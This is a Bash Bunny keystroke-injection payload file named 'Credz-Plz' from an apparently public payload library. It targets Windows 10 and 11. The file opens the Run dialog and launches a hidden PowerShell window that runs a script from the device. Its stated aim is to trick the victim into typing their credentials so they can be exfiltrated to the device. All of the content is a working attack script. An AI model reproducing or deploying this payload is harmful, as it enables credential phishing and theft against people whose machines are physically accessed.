bashbunny-payloads/payloads/library/credentials/-BB-Credz-Plz/payload.txt

23 lines
557 B
Plaintext

# Title: Credz-Plz
# Description: A script used to prompt the target to enter their creds to later be exfiltrated to the Bash Bunny
# Author: I am Jakoby
# Version: 1.0
# Category: Recon
# Attackmodes: HID, Storage
# Target: Windows 10, 11
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
LED STAGE1
QUACK DELAY 3000
QUACK GUI r
QUACK DELAY 100
LED STAGE2
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\Credz-Plz.ps1')"
QUACK ENTER